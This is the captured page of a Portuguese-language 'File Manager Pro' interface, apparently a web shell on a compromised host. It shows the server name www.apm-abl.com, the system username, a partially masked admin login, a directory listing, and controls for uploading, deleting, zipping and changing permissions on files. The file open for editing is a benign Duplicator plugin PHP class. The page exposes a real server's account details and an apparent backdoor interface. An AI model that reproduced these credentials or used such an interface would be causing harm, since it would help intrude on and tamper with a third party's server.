🗂️ File Manager Pro
🖥️ Tipo de Hospedagem:
Vps
📁 Diretório Raiz:
/home
🌐 Servidor:
www.apm-abl.com
👤 Usuário:
apmablcosr
🔐 Sessão:
🔑 Credenciais:
adm_cf322990 / 2065****
📍 Localização Atual:
home
Caminho completo: /home
📤 Enviar Arquivo
📁 Nova Pasta
⬆️ Voltar
🏠 Raiz
🗑️ DELETAR
📦 ZIPAR/DEZIPAR
Status
Nome
Tamanho
Modificado
Permissões
Ações
📁 a
-
03/02/2026 22:15
0755
✏️
📁 apmablcosr
-
26/01/2026 16:35
0705
✏️
🗑️
Editando: DupArchiveDirectoryHeader.php
<?php /** * * @package Duplicator * @copyright (c) 2021, Snapcreek LLC */ namespace Duplicator\Libs\DupArchive\Headers; use Exception; // Format class DupArchiveDirectoryHeader extends DupArchiveReaderDirectoryHeader { public $mtime = 0; public $permissions = ''; public $relativePathLength = 1; public $relativePath = ''; /** * Write header in archive * * @param resource $archiveHandle archive resource * * @return int bytes written */ public function writeToArchive($archiveHandle) { if ($this->relativePathLength == 0) { // Don't allow a base path to be written to the archive return; } $headerString = '<D><MT>' . $this->mtime . '</MT><P>' . $this->permissions . '</P><RPL>' . $this->relativePathLength . '</RPL><RP>' . $this->relativePath . '</RP></D>'; //SnapIO::fwrite($archiveHandle, $headerString); $bytes_written = @fwrite($archiveHandle, $headerString); if ($bytes_written === false) { throw new Exception('Error writing to file.'); } else { return $bytes_written; } } }
💾 Salvar
❌ Cancelar
Enviar Arquivo
Selecionar arquivo:
Enviar
Cancelar
Criar Nova Pasta
Nome da pasta:
Criar
Cancelar
Alterar Permissões
Nova permissão:
0644 (rw-r--r--)
0755 (rwxr-xr-x)
0777 (rwxrwxrwx)
0600 (rw-------)
0700 (rwx------)
0444 (r--r--r--)
💾 Salvar
Cancelar